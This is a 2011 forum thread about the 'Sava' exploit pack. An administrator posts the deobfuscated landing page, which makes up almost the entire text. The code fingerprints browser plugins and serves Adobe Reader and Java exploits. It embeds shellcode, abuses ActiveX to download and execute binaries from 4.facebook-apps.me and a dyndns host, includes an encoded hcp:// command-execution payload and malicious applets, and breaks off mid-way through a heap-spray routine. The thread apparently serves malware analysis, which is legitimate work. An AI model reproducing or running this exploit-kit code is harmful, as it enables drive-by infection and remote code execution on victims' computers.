Author Topic: Sava Exploits Pack  (Read 4198 times)

0 Members and 1 Guest are viewing this topic.

June 15, 2011, 09:32:10 am
Read 4198 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

September 03, 2011, 09:39:27 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Deobfuscated code example:

Code: [Select]
<HTML><HEAD><title>.</title>
    <script type="text/javascript">
        function OnBeforeUnLoad () {
window.open("http://4.facebook-apps.me/panel/virtest.html","_blank","location=0,status=0,scrollbars=0, width=100%,height=100%")
            return "All data that you have entered will be lost!";
        }
    </script>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
var objectSource = "http://4.facebook-apps.me/panel/load.php?spl=new_FF";
</script>
</head>
<body  onbeforeunload="return OnBeforeUnLoad ()" BGCOLOR="#000000" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form>
<center>
<SCRIPT language="JavaScript">
setTimeout("ObjectLoad()",3000);
</SCRIPT>
<center>
<br>
<object id="MediaPlayer1" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
standby="Loading Microsoft Windows® Media Player components..." type="application/x-oleobject" width="280" height="256">
<param name="lola.wav">
<param name="animationatStart" value="true">
<param name="transparentatStart" value="true">
<param name="autoStart" value="true">
<param name="showControls" value="true">
<param name="Volume" value="-450">
<embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="lola.wav" name="MediaPlayer1" width=1 height=1 autostart=1 showcontrols=1 volume=-450>
</object>
<br>
<center><table CELLPADDING=10 CELLSPACING=10><td BGCOLOR=yellow><font FACE="helvetica,arial,geneva"><H1><b>Free Porn Archive<b></H1> Complite last hour update ....
<script type="text/javascript">
var startTime=new Date();

function currentTime(){
  var a=Math.floor((new Date()-startTime)/100)/10;
  if (a%1==0) a+=".0";
  document.getElementById("endTime").innerHTML=a;
}

window.onload=function(){
  clearTimeout(loopTime);
}
  document.write('This page took <span id="endTime">0.0</span> seconds to load.');
  var loopTime=setInterval("currentTime()",100);
</script></font></td>></table></center>

      <SCRIPT>
var PLAYER_URL='';
var PLAYER_VERSION='1';
var PLAYER_ID='1';
var THUMB_URL='http://4.facebook-apps.me/panel/clip_files/120110064808_4b4d0a389c3d3.jpg';
var PLAY_URL='';
var GET_URL='http://4.facebook-apps.me/panel/load.php?spl=Direcct_Player';
var FILENAME='';
var HIDE_FROM_WM=false;
var IS_WM_CHECK=false;
var WM_URL='http://google.com/';
</SCRIPT>

      <SCRIPT charset=UTF-8 src="http://4.facebook-apps.me/panel/1.js" tppabs="http://4.facebook-apps.me/panel/1.js"></SCRIPT>
</center>
<br>
<div id="carrot_onfocus" style="position:absolute;top:-5000;left:-50000;z-index:-50000">

<body>


</body>
<script type="text/javascript" src="PluginDetect.js"></script>
<script type="text/javascript">

function acrobatCheck() {
var acrobat=new Object();
acrobat.installed=false;
acrobat.version='0';

var adobe = PluginDetect.getVersion("AdobeReader");
if(adobe!=null){
acrobat.installed=true;
var vArray = adobe.split(",");
acrobat.version = vArray[0] + vArray[1] + vArray[2];
}
return acrobat;
}

function javaCheck() {
var ojava=new Object();
ojava.installed=false;
ojava.version='0';
ojava.build='0';

var javaversion = PluginDetect.getVersion('Java', 'getJavaInfo.jar')

if(javaversion!=null){
ojava.installed=true;
var vArray = javaversion.split(",");
ojava.version = vArray[1];
ojava.build = vArray[3];
}
return ojava;
}

var ExploitFrames = new Array();
var CurrentExploit = 0;

function VisitorCheck(){
var mydiv=document.createElement("div");
mydiv.innerHTML="<iframe src='about:blank' width='1' height='1'></iframe>";
document.body.appendChild(mydiv);
}

function NextExploit(){

var mydiv=document.createElement("div");
mydiv.innerHTML="<iframe src='" + ExploitFrames[CurrentExploit] + "' width='1' height='1'></iframe>";
document.body.appendChild(mydiv);

if(CurrentExploit < ExploitFrames.length - 1){
CurrentExploit++;
setTimeout("NextExploit()", 3000);
}
}

function acrobatExploit(){
var acrobat = acrobatCheck();
if(acrobat.installed){
if(acrobat.version >= 800 && acrobat.version < 821){
ExploitFrames.push("get.php?e=Adobe-80-2010-0188");
}else if(acrobat.version >= 900 && acrobat.version < 940){
if(acrobat.version < 931){
ExploitFrames.push("get.php?e=Adobe-90-2010-0188");
}else if(acrobat.version < 933){
ExploitFrames.push("get.php?e=Adobe-2010-1297");

}else if(acrobat.version < 940){
ExploitFrames.push("get.php?e=Adobe-2010-2884");
}
}else if(acrobat.version >= 700 && acrobat.version < 711){
ExploitFrames.push("get.php?e=Adobe-2008-2992");
}
}
}
function javaExploit(){
var ojava = javaCheck();
if(ojava.installed){
if(ojava.version < 6 || (ojava.version == 6 && ojava.build < 19)){
ExploitFrames.push("get.php?e=Java-2010-0842");


}
}
}
function javaSigned(){
var ojava = javaCheck();
if(ojava.installed){
ExploitFrames.push("get.php?e=JavaSignedApplet");
}
}

VisitorCheck();

javaExploit();

acrobatExploit();

javaSigned();
if(ExploitFrames.length > 0){
NextExploit();
}

</script><iframe src="http://4.facebook-apps.me/panel/ifrAttacker.html" scrolling="no" frameborder="0" width="55px" height="55px"></iframe>
<iframe src="http://4.facebook-apps.me/panel/ifrLocal.html" scrolling="no" frameborder="1" width="55px" height="55px"></iframe>


<applet code='favort.siurele.class' archive='http://4.facebook-apps.me/panel/mndrtdsf.jar' width='300' height='150'><param name='assof' value='http://4.facebook-apps.me/panel/load.php?spl=mndrtdsf.jar'/></applet><applet codebase="file:C:\Program Files\java\jre6\lib\ext" width="750" height="400" code="http://3286924749/AppletX"><param name="eduzy" value="http://4.facebook-apps.me/panel/load.php?spl=jre6" /></applet>

<script type="text/javascript">
document.write("<style type='text/css'>.css {behavior: url(#default#userData);}</style><MARQUEE id='mrq' class='css'></MARQUEE><iframe src='about:blank' frameborder='0' width='1' height='1' id='helloin' name='helloin'></iframe></body>");
var NidUqyt = window;
document.write("<OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>");
document.write("<object width='0' height='0' id='java_obj' classid='clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'><PARAM name='launchjnlp' value='1'><PARAM name='docbase' value='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#xc1;L4&#x7c;&#xec;&#x26;&#x11;y8vqc8&#xf2;&#xfe;e&#x3f;&#xcf;&#xad;&#x0f;4&#xa0;7&#x7c;&#x5e;&#xd0;4&#x7c;&#xea;05&#x7c;&#xac;&#x13;4&#x7c;&#xf8;&#x2e;7&#x7c;&#x10;&#x01;&#x04;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;7Y4&#x7c;p&#xb1;8&#x7c;O&#x2f;7&#x7c;&#x27;44&#x7c;&#x90;Q&#x5f;&#xc3;&#x2b;&#xe7;4&#x7c;&#x5c;&#x3f;&#x7e;G&#x2a;9&#xf5;5&#xec;&#x0b;&#xf5;Zk&#xf4;6&#x1c;&#xc8;&#x03;5&#x7c;&#x0e;k4&#x7c;O&#x2f;7&#x7c;&#xc1;L4&#x7c;&#x60;&#xb1;8&#x7c;&#x5f;&#xaa;5&#x7c;&#x0b;i5&#x7c;&#x12;p&#x3f;&#xd2;&#x3f;64&#x7c;Q&#xce;t&#x1c;&#x3e;V&#x2c;&#xad;&#xc1;L4&#x7c;p&#xb1;8&#x7c;&#xea;05&#x7c;&#x5e;&#xd0;4&#x7c;&#xac;&#x13;4&#x7c;&#x3a;&#x1d;63AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#xeb;B&#x5f;&#xb9;&#xff;&#xff;&#xff;&#xff;&#x89;&#xfe;&#xb0;&#xff;&#xf2;&#xae;&#xfe;G&#xff;&#x89;&#xfb;&#xb0;&#xff;&#xf2;&#xae;&#xfe;G&#xff;&#x89;&#xfd;&#xf2;&#xae;&#xfe;G&#xff;&#xeb;t&#x60;1&#xc9;d&#x8b;q0&#x8b;v&#x0c;&#x8b;v&#x1c;&#x8b;&#x5e;&#x08;&#x8b;V&#x20;&#x8b;6f9J&#x18;u&#xf2;&#x89;&#x5c;&#x24;&#x1c;a&#xc3;&#xeb;&#x7c;&#x60;&#x8b;l&#x24;&#x24;&#x8b;E&#x3c;&#x8b;T&#x05;x&#x01;&#xea;&#x8b;J&#x18;&#x8b;Z&#x20;&#x01;&#xeb;&#xe3;7I&#x8b;4&#x8b;&#x01;&#xee;1&#xff;1&#xc0;&#xfc;&#xac;&#x84;&#xc0;t&#x0a;&#xc1;&#xcf;&#x0d;&#x01;&#xc7;&#xe9;&#xf1;&#xff;&#xff;&#xff;&#x3b;&#x7c;&#x24;&#x28;u&#xde;&#x8b;Z&#x24;&#x01;&#xeb;f&#x8b;&#x0c;K&#x8b;Z&#x1c;&#x01;&#xeb;&#x8b;&#x04;&#x8b;&#x01;&#xe8;&#x89;D&#x24;&#x1c;a&#xc3;&#xe8;&#x87;&#xff;&#xff;&#xff;&#xba;&#x8e;N&#x0e;&#xec;RP&#xe8;&#x9e;&#xff;&#xff;&#xff;V&#xff;&#xd0;&#xba;6&#x1a;&#x2f;pRP&#xe8;&#x8f;&#xff;&#xff;&#xff;1&#xd2;RRSUR&#xff;&#xd0;&#xeb;&#x1a;&#xeb;&#x3d;&#xe8;Z&#xff;&#xff;&#xff;&#xba;&#x7e;&#xd8;&#xe2;sRP&#xe8;q&#xff;&#xff;&#xff;1&#xd2;R&#xff;&#xd0;&#xeb;i&#xe8;B&#xff;&#xff;&#xff;&#xba;&#x98;&#xfe;&#x8a;&#x0e;RP&#xe8;Y&#xff;&#xff;&#xff;1&#xd2;&#x81;&#xc2;&#xff;&#xff;&#xff;&#xff;&#x81;&#xea;&#xfa;&#xff;&#xff;&#xff;RS&#xff;&#xd0;&#xeb;&#xc3;&#xe8;&#xfc;&#xfe;&#xff;&#xff;urlmon&#x2e;dll&#xff;test&#x2e;exe&#xff;http&#x3a;&#x2f;&#x2f;muvie&#x2e;dyndns&#x2e;tv&#x2f;load&#x2e;php&#x3f;spl&#x3d;QQkEEkcJBQQEBAQG&#x26;p&#x3d;2&#xff;&#xcd;&#x03;'></object><embed type='application/x-java-applet' width='0' height='0' launchjnlp='1' docbase='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#xc1;L4&#x7c;&#xec;&#x26;&#x11;y8vqc8&#xf2;&#xfe;e&#x3f;&#xcf;&#xad;&#x0f;4&#xa0;7&#x7c;&#x5e;&#xd0;4&#x7c;&#xea;05&#x7c;&#xac;&#x13;4&#x7c;&#xf8;&#x2e;7&#x7c;&#x10;&#x01;&#x04;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;7Y4&#x7c;p&#xb1;8&#x7c;O&#x2f;7&#x7c;&#x27;44&#x7c;&#x90;Q&#x5f;&#xc3;&#x2b;&#xe7;4&#x7c;&#x5c;&#x3f;&#x7e;G&#x2a;9&#xf5;5&#xec;&#x0b;&#xf5;Zk&#xf4;6&#x1c;&#xc8;&#x03;5&#x7c;&#x0e;k4&#x7c;O&#x2f;7&#x7c;&#xc1;L4&#x7c;&#x60;&#xb1;8&#x7c;&#x5f;&#xaa;5&#x7c;&#x0b;i5&#x7c;&#x12;p&#x3f;&#xd2;&#x3f;64&#x7c;Q&#xce;t&#x1c;&#x3e;V&#x2c;&#xad;&#xc1;L4&#x7c;p&#xb1;8&#x7c;&#xea;05&#x7c;&#x5e;&#xd0;4&#x7c;&#xac;&#x13;4&#x7c;&#x3a;&#x1d;63AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#xeb;B&#x5f;&#xb9;&#xff;&#xff;&#xff;&#xff;&#x89;&#xfe;&#xb0;&#xff;&#xf2;&#xae;&#xfe;G&#xff;&#x89;&#xfb;&#xb0;&#xff;&#xf2;&#xae;&#xfe;G&#xff;&#x89;&#xfd;&#xf2;&#xae;&#xfe;G&#xff;&#xeb;t&#x60;1&#xc9;d&#x8b;q0&#x8b;v&#x0c;&#x8b;v&#x1c;&#x8b;&#x5e;&#x08;&#x8b;V&#x20;&#x8b;6f9J&#x18;u&#xf2;&#x89;&#x5c;&#x24;&#x1c;a&#xc3;&#xeb;&#x7c;&#x60;&#x8b;l&#x24;&#x24;&#x8b;E&#x3c;&#x8b;T&#x05;x&#x01;&#xea;&#x8b;J&#x18;&#x8b;Z&#x20;&#x01;&#xeb;&#xe3;7I&#x8b;4&#x8b;&#x01;&#xee;1&#xff;1&#xc0;&#xfc;&#xac;&#x84;&#xc0;t&#x0a;&#xc1;&#xcf;&#x0d;&#x01;&#xc7;&#xe9;&#xf1;&#xff;&#xff;&#xff;&#x3b;&#x7c;&#x24;&#x28;u&#xde;&#x8b;Z&#x24;&#x01;&#xeb;f&#x8b;&#x0c;K&#x8b;Z&#x1c;&#x01;&#xeb;&#x8b;&#x04;&#x8b;&#x01;&#xe8;&#x89;D&#x24;&#x1c;a&#xc3;&#xe8;&#x87;&#xff;&#xff;&#xff;&#xba;&#x8e;N&#x0e;&#xec;RP&#xe8;&#x9e;&#xff;&#xff;&#xff;V&#xff;&#xd0;&#xba;6&#x1a;&#x2f;pRP&#xe8;&#x8f;&#xff;&#xff;&#xff;1&#xd2;RRSUR&#xff;&#xd0;&#xeb;&#x1a;&#xeb;&#x3d;&#xe8;Z&#xff;&#xff;&#xff;&#xba;&#x7e;&#xd8;&#xe2;sRP&#xe8;q&#xff;&#xff;&#xff;1&#xd2;R&#xff;&#xd0;&#xeb;i&#xe8;B&#xff;&#xff;&#xff;&#xba;&#x98;&#xfe;&#x8a;&#x0e;RP&#xe8;Y&#xff;&#xff;&#xff;1&#xd2;&#x81;&#xc2;&#xff;&#xff;&#xff;&#xff;&#x81;&#xea;&#xfa;&#xff;&#xff;&#xff;RS&#xff;&#xd0;&#xeb;&#xc3;&#xe8;&#xfc;&#xfe;&#xff;&#xff;urlmon&#x2e;dll&#xff;test&#x2e;exe&#xff;http&#x3a;&#x2f;&#x2f;muvie&#x2e;dyndns&#x2e;tv&#x2f;load&#x2e;php&#x3f;spl&#x3d;QQkEE&#x26;p&#x3d;2&#xff;&#xcd;&#x03;' /></embed>");

function xkg(nsu, js) {
    var mawa = null;
    try {
        mawa = nsu.CreateObject(js)
    } catch (e) {}
    if (!mawa) {
        try {
            mawa = nsu.CreateObject(js, "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.CreateObject(js, "", "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject("", js)
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject(js, "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject(js)
        } catch (e) {}
    }
    return (mawa);
}
function gr(sgw) {
    var ha = 'http://4.facebook-apps.me/panel/load.php?spl=ADODB.Stream';
    qbnp = "setup.exe";
    var dyv = sgw.CreateObject("Scripting.FileSystemObject", "");
    var sap = xkg(sgw, "Shell.Application");
    var ji = xkg(sgw, "ADODB.Stream");
    var sx = null;
    qbnp = dyv.BuildPath(dyv.GetSpecialFolder(2), qbnp);
    ji.Mode = 3;
    try {
        sx = xkg(sgw, "Microsoft.XMLHTTP");
        sx.open("GET", ha, false);
    } catch (e) {
        try {
            sx = xkg(sgw, "MSXML2.XMLHTTP");
            sx.open("GET", ha, false);
        } catch (e) {
            try {
                sx = xkg(sgw, "MSXML2.ServerXMLHTTP");
                sx.open("GET", ha, false);
            } catch (e) {
                try {
                    sx = new XMLHttpRequest();
                    sx.open("GET", ha, false);
                } catch (e) {
                    return 0;
                }
            }
        }
    }
    ji.Type = 1;
    sx.send(null);
    rb = sx.responseBody;
    ji.Open();
    ji.Write(rb);
    ji.SaveTofile(qbnp, 2);
    sap.ShellExecute(qbnp);
    return 1;
}
function step0() {
    if (navigator.userAgent.indexOf('IE 6') == -1) {
        step1();
        return 0;
    }
    var pabl = 0;
    var lhqh = new Array('BD96C556-65A3-11D0-983A-00C04FC29E36', 'BD96C556-65A3-11D0-983A-00C04FC29E30', 'AB9BCEDD-EC7E-47E1-9322-D4A210617116', '0006F033-0000-0000-C000-000000000046', '0006F03A-0000-0000-C000-000000000046', '6e32070a-766d-4ee6-879c-dc1fa91d2fc3', '6414512B-B978-451D-A0D8-FCFDF33E833C', '7F5B7F63-F06F-4331-8A26-339E03C0AE3D', '06723E09-F4C2-43c8-8358-09FCD1DB0766', '639F725F-1B2D-4831-A9FD-874847682010', 'BA018599-1DB3-44f9-83B4-461454C84BF8', 'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19', 'E8CCCDDF-CA28-496b-B050-6C07C962476B', null);
    while (lhqh[pabl]) {
        var sgw = null;
        sgw = document.createElement("object");
        sgw.setAttribute("classid", "clsid:" + lhqh[pabl]);
        if (sgw) {
            try {
                var hjh = xkg(sgw, "Shell.Application");
                if (hjh) {
                    if (gr(sgw)) step1();
                    return 1;
                }
            } catch (e) {}
        }
        pabl++;
    }
    step1();
}

function step1() {
    try {
        var cg = "http: -J-jar -J\\4.facebook-apps.me\webdav\new.avi  http://4.facebook-apps.me/panel/load.php?spl=new_avi2 none";
        if (window.navigator.appName == 'Microsoft Internet Explorer') {
            try {
                var uiu = document.createElement('OBJECT');
                uiu.classid = 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA';
                uiu.launch(cg);
            } catch (e) {
                var ghtb = document.createElement('OBJECT');
                ghtb.classid = 'clsid:8AD9C840-044E-11D1-B3E9-00805F499D93';
                ghtb.launch(cg);
            }
        } else {
            var uiu = document.createElement('OBJECT');
            var ze = document.createElement('OBJECT');
            uiu.type = 'application/npruntime-scriptable-plugin;deploymenttoolkit';
            ze.type = 'application/java-deployment-toolkit';
            document.body.appendChild(uiu);
            document.body.appendChild(ze);
            try {
                uiu.launch(cg);
            } catch (e) {
                ze.launch(cg);
            }
        }
    } catch (e) {
        step2();
    };
    step2();
}

function step2() {
    try {
        var fn = "hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<scr" + "ipt defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,102,114,101,101,104,105,116,46,100,121,110,100,110,115,46,111,114,103,47,119,101,98,46,101,120,101,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</scr" + "ipt>";
        var m = document.createElement("iframe");
        m.setAttribute("src", fn);
        m.setAttribute("width", 0);
        m.setAttribute("height", 0);
        m.setAttribute("frameborder", "0");
        document.body.appendChild(m);
    } catch (e) {
        step3();
    }
    step3();
}

function fghjdfgxbz(fn) {
    var p = document.createElement('iframe');
    p.setAttribute('src', fn);
    p.setAttribute('width', 300);
    p.setAttribute('height', 200);
    p.setAttribute('frameborder', '0');
    document.body.appendChild(p);
}

function step3() {
    if ((navigator.userAgent.indexOf('Firefox')) != -1 || (navigator.userAgent.indexOf('Opera')) != -1) {
        fghjdfgxbz('http://4.facebook-apps.me/panel/npdf.php');
    } else {
        var lv = Pdf1.GetVersions();
        var fi = /EScript=([^,]+),/;
        var fif = /AcroForm=([^,]+),/;
        lvf = lv.match(fif)[1].split('.');
        lv = lv.match(fi)[1].split('.');
        sv = parseInt(lv[0]);
        lv = parseInt(lv.join(''));
        lvf = parseInt(lvf.join(''));
        if (lv >= 800) {
            fghjdfgxbz('http://4.facebook-apps.me/panel/npdf.php');
        } else {
            fghjdfgxbz('http://4.facebook-apps.me/panel/npdf.php');
        }
    }
}
step0();
</script>
<script type="text/javascript">
function spl0() {
        document.write("<applet code='search.parser.class' archive='mario.jar' width='1' height='1'><param name='request' value='http://4.facebook-apps.me/panel/load.php?spl=search.parser'/></applet>");

    spl1()
}
function spl1() {
        var trifr = document.createElement('IFRAME');
        trifr.setAttribute('width', 1);
        trifr.setAttribute('height', 1);
        trifr.setAttribute('src', 'http://4.facebook-apps.me/panel/java_trust.php');
        document.body.appendChild(trifr)
    spl3()
}
function spl3() {
        var slifr = document.createElement('IFRAME');
        slifr.setAttribute('width', 1);
        slifr.setAttribute('height', 1);
        slifr.setAttribute('src', 'http://4.facebook-apps.me/panel/java_skyline.php');
        document.body.appendChild(slifr)
    spl4()
}
function spl4() {
    var ra4 = "./svchost.exe",
        ra3 = document.createElement("object");
    ra3.setAttribute("id", ra3);
    ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    try {
        var ra0 = ra3.CreateObject("adodb.stream", ""),
            ra1 = ra3.CreateObject("Shell.Application", ""),
            ra2 = ra3.CreateObject("msxml2.XMLHTTP", "");
        try {
            ra2.open("GET", "http://4.facebook-apps.me/panel/load.php?spl=XMLHTTP", false);
            ra2.send();
            ra0.type = 1;
            ra0.open();
            ra0.Write(ra2.responseBody);
            ra0.SaveToFile(ra4, 2);
            ra0.Close();
        } catch (e) {}
        try {
            ra1.shellexecute(ra4);
        } catch (e) {}
    } catch (e) {}
    spl6()
}

function spl6() {
    try {
                m = document.createElement('IFRAME');
                m.setAttribute('src', 'http://4.facebook-apps.me/panel/hcp_asx.php');
                m.setAttribute('width', 0);

                m.setAttribute('height', 0);
                document.body.appendChild(m)

    } catch (e) {}
}
spl0()

</script>
<applet width="900" height="800"><param name="code" value="http://3286924353/I6F3G4N7.jar"><param name="codebase" value="file:C:\Program Files\java\jre6\lib\ext"><param name="foreground" value="http://4.facebook-apps.me/panel/load.php?spl=jre6"></applet>
<APPLET CODE="Gallery_Viewer.class" ARCHIVE="Gallery_Viewer.jar" WIDTH="1" HEIGHT="1"><PARAM NAME="URL_CODE" VALUE="http://4.facebook-apps.me/panel/load.php?spl=Silend_galery"></APPLET>
<applet width='1' height='1' code='I6F3G4N7.class' archive='I6F3G4N7.jar'>
<param name="transition_delay" value="0">
<param name="delay" value="2000">
<param name="step_count" value="0">
<param name="mode" value="0">
<param name="image_align" value="center">
<param name="image_valign" value="center">
</applet>
<applet code="Main.class" archive="signedapplet.jar" width="1" height="1" >
<param name="fileName" value="MyFile.jar">
<param name="url" value="http://4.facebook-apps.me/panel/load.php?spl=turk_signedapplet">
</applet>
<applet code="Sun_Microsystems_Java_Security_Update_6.class" archive="Sun_Microsystems_Java_Security_Update_6.jar" width="1" height="1">
<param name='file' value="http://4.facebook-apps.me/panel/load.php?spl=Sun_Microsystems">
</applet>
<Applet Code="MSFcmd.class" archive="MSFcmd.jar" width="1" Height="1">
<PARAM NAME="FileName" VALUE="update.exe">
<PARAM NAME="URL" VALUE="http://4.facebook-apps.me/panel/load.php?spl=MSFcmd">
</applet>
<applet archive="http://4.facebook-apps.me/panel/java/java.jar" code="GetAccess.class" width=1   height=1><param name="ModulePath" value="http://4.facebook-apps.me/panel/load.php?spl=GetAccess"></applet>
<applet archive="SiteLoader.jar" code="SiteLoader.class" height="1" width="1"></applet>
<applet archive="Exploit.jar" code="vuln.Exploit.class" height="1" width="1"></applet>
<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig! = 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\4.facebook-apps.me\webdav\index.php");
</script>

<script>
document.write("<OBJECT id=jdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>");
    var ver = jdf1.GetVersions();
    ver = ver.split(",");
ver = ver[1].split("=");
ver = ver[1];

if((ver >= "8.0.0") && (ver <="8.3.0") || (ver >= "9.0.0") && (ver <="9.3.0"))
{
document.write('<iframe src="http://4.facebook-apps.me/panel/npdf.php" width="349" height="258" frameborder="0"></iframe>');
}
else
{
document.write('<iframe src="http://4.facebook-apps.me/panel/old_pdf.php" width="59" height="407" frameborder="0"></iframe>');
}
</script><object id="MediaPlayer1" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
standby="Loading Microsoft Windows® Media Player components..." type="application/x-oleobject" width="280" height="256">
<param name="http://4.facebook-apps.me/panel/Ledi_Gaga.m3u">
<param name="animationatStart" value="true">
<param name="transparentatStart" value="true">
<param name="autoStart" value="true">
<param name="showControls" value="true">
<param name="Volume" value="-450">
<embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="http://4.facebook-apps.me/panel/Ledi_Gaga.m3u" name="MediaPlayer1" width=1 height=1 autostart=1 showcontrols=1 volume=-450>
</object> <OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="http://4.facebook-apps.me/panel/DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressbackground" VALUE="#bccee8">
<PARAM NAME="propTextbackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="http://4.facebook-apps.me/panel/load.php?spl=AX_cab">
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propbrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0">
</OBJECT>        <html>
<body>
<script language='javascript'>
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u2240%u9ff8");
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
